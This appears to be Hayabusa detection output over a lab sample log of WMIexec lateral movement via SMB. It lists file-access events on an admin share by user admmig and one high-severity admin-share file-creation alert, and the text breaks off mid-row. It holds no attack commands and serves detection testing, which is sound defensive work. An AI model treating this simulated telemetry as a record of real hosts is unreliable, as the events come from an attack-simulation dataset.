+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution 